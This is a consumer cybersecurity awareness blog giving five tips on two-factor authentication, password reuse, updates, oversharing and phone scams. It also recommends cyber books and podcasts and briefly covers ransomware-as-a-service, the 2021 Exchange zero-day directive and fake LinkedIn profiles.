How to protect yourself online

In a time where companies, celebrities, and even governments are frequently coming under cyber-attack, getting hacked might seem inevitable. The good news however, is that you can do something to protect yourself, your family, and your work by following just 5 essential cyber tips.

These tips stop hackers like those seen in Mr Robot in their tracks.

So what’s the relevance of Mr Robot when it comes to hacking and cyber attacks? The popular TV series “Mr. Robot” is probably one of the most accurate portrayals of what hackers actively do in real life, and some of the techniques used.

So if you want to get more street wise, it’s an entertaining way of educating yourself about hackers and their tricks.If you’re interested in hacking and don’t understand a lot of this, the TV show itself actually employs hackers to work on the show to depict real-life hacks that could happen in real life and it’s a very accurate portrayal of everything that we see today. From being able to hack smartphones to getting access to a big corporation and being able to bring them to their knees from a cyber perspective.

So let’s reveal 5 important things you can do to make yourself much more secure both at home, as well as whilst at work, and beat those hoodied hackers:

1. Use two-factor authentication (aka two-step, 2FA, multi-factor) everywhere that you can

The majority of modern banking platforms, email, Twitter, Facebook etc all support the ability for you to enable multi-factor / two factor. So even if your username and passwords are exposed to hackers (believe me it happens) you are still protected by an additional factor.

What you may not know is that most cyber criminals also know how to steal your mobile phone number, so that they receive your SMS multi-factor code instead of you in order to get around SMS based multi-factor solutions. The cyber attacks can port or SIM swap your mobile phone service, hence why where possible – always use application based two factor rather than just SMS e.g. like Microsoft Authenticator or Google Authenticator, Authy etc.

2. Don’t use the same password everywhere

I know it’s hard, but using the same password everywhere is one of probably the easiest ways that we break in as hackers. So if you re-use the same password across LinkedIn, Dropbox or your cloud based email password – we can easily find your password from breach data on the dark net, and get into your email and reset your passwords for other accounts.

If you think I’m making it up, go check out your personal email addresses on the service, and see if your password are already in the hands of hackers. Identity take-overs are then easy – whereby hackers could take out loans, credit cards, mortgages etc using your identity.

Consider using a password manager across all of your devices, so that you only use long unique passwords, that your password manager remembers rather than you. Enable multi-factor on your password manager too.

3. Update update update!

Yep – those pesky security patches. Every time you have a Windows update, mobile phone / tablet, or Apple device that says “hey I need to update your device!”, it’s usually to fix a known attack that hackers have figured out how to use against you. So keep up to date in order to protect yourself. Some people think Apple devices are impenetrable to cyber attack – however that’s not the case. They have security weaknesses too, and often need to be updated. So if you’re using Windows or Apple computers – it’s the same thing, update your systems.

It’s also the same thing for third-party applications. If you’re using Java, Adobe, PDFs, MS Office, those are all things that you want to keep up to date and that makes it much harder for hackers to break in to your system.

4. Carefully consider the information you share online

Your personal information is incredibly valuable to hackers so be aware of what info is collected about you and what information you share online. We as attackers can look at information you share online and craft custom phishing attacks against you.

Think of what we could do with info such as your personal or professional interests, what events you are attending, job description & connections…. shared publicly on Facebook / LinkedIn. We can use this info as a method to attack you.

Be proactive in managing your privacy by checking the privacy and security settings on your online accounts and apps, watch out for fake profiles and don’t connect with people you don’t actually know in real life.

A very common trick hackers use is to create a customised phishing email.

Most hackers these days know how to play on your emotions.

Be it curiosity, urgency, whatever it takes to get you to open an email, and click on a malicious link. If you do click on that link, hackers might install a key stroke logger, or a back door into your system, and the network they are connected to.

5. Last but not least, safe guard your personal information.

That’s one of the biggest things that attackers can leverage to get access to you and your data. Things like your date of birth, TFN, or your credit card numbers. So as an example, someone shouldn’t be calling you from a banking service and asking you for that type of information.

This is a common scam – where they’ll pretend to be your bank / /financial service, your mobile phone service provider, Microsoft, or the ATO. So whenever you get a call asking for personal information tell them you’ll call them back. Look up the contact number on their website and call back to verify.

That’s it – 5 simple steps that will help protect you against hackers.

Have any more tips, suggestions or feedback? Leave in the comments below.

Inspiring cyber / privacy books, podcasts, documentaries and websites

I often get asked by friends and colleagues for recommendations on latest info to read / listen to for all things cyber & privacy, or interesting & inspiring material to read up on.

I therefore decided it would be useful to share this more broadly, hence this page.

Here’s my latest recommendations:

“Darknet Diaries”

Podcast by Jack Rhysider. A mix of very interesting cyber related stories on a number of current topics. Well put together, and easy to listen to:

“Future Crimes”

Book by Marc Goodman. A scary look into the current and future of our everything connected world. Did you read those terms of service?

“The Great Hack”

An eye opening documentary available on Netflix about the Cambridge Analytica, big data, and our future:

“The Dark Net isn’t what you think.” TED Talk

Alex Winter’s (think Bill and Ted) infamous TED talk on the dark web. Makes you realise that there’s a lot more to the dark web than meets the eye:

“Click here to kill everybody” Book

A very interesting read from the renowned cyber security guru – Bruce Schneier:

The Cuckoo’s Egg: Tracking a Spy Through the Maze of Computer EspionageBook

I read this at uni, and literally didn’t put it down until I had finished reading from cover to cover. One of the main reasons I got into cyber security in the first place!

Cyber News & Update Sites:

A few more handy / interesting cyber / privacy related sites:

Crying Baby Social Engineering

This is a great example of how human manipulation can easily trick someone into doing something they shouldn’t.

A crying baby and convincing friendly female voice is sure to get someone doing something they shouldn’t.

This video brings this technique to life!

Marc Goodman – a vision of crimes now, and in the near future

Scary wake up call looking at the darker underbelly of tech and society…

Group-IB “Ransomware Uncovered 2020 – 2021” Report Published

Cyber security company Group-IB have recently published a eye opening report on ransomware – revealing that almost two-thirds of ransomware attacks analysed during 2020 came from cyber criminals operating on a RaaS model.

The report is well worth a read, and provides insightful details on how gangs operate and info to help cyber defence teams thwart attacks. It also includes some great threat hunting and detection tips.

Such is the demand for ransomware as a service, that 15 new ransomware affiliate schemes appeared during 2020, including Thanos, Avaddon, SunCrypt, and many others. Competition among ransomware developers can even lead to the authors providing special deals to wannabe crooks, which is more bad news for potential victims.

Group-IB’s DFIR team has for the first time mapped the most commonly used TTPs in 2020 in accordance with MITRE ATT&CK®.

Here’s a link to the full report:

cybersecurity #intelligence #infosec

CISA issues emergency directive following Microsoft Exchange zero-day vulnerability fixes

The US Cybersecurity and Infrastructure Security Agency (CISA) has issued an emergency directive following the release of fixes for zero-day vulnerabilities in Microsoft Exchange. 

On 2 March 2021, Microsoft released emergency security updates to fix four security holes in Exchange Server versions 2013 through 2019 that hackers were actively using to siphon email communications from Internet-facing systems running Microsoft Exchange.

In the three days since then, security experts say the same Chinese cyber espionage group has dramatically stepped up attacks on any vulnerable, unpatched Exchange servers worldwide. In the majority of incidents, the intruders left behind a “web shell” – a password-protected hacking tool, which can be accessed over the Internet from any browser. The web shell gives the attackers administrative access to the victim’s computer.

Read more on this incident here:

Luscious LinkedIn Profiles – Please connect with me!?

Have you ever received a LinkedIn invitation from someone you don’t actually know, but accepted it anyway because the profile photo looked ‘interesting’ or ‘attractive’? It’s one of the oldest tricks in the book used to connect with you and your contacts… would you be upset if I told you that it’s just a social engineering trick?

There are all sorts of people out there who try and connect via LinkedIn using a few different techniques to convince you to connect. Once you are a connection, they can use the information you share for a variety of purposes, both good and bad.

When you receive an invite, stop and think before accepting. Do a google search on the person, and work out if they are real. Look them up on Instagram or Facebook, and see what content you can find. Do a reverse image search, and see if the image is just a stock photo.

Chances are they aren’t real, and it’s a sales technique or malicious person trying to connect.

Mike Winnet explains this technique really well in one of his vlog videos, so you might enjoy watching below: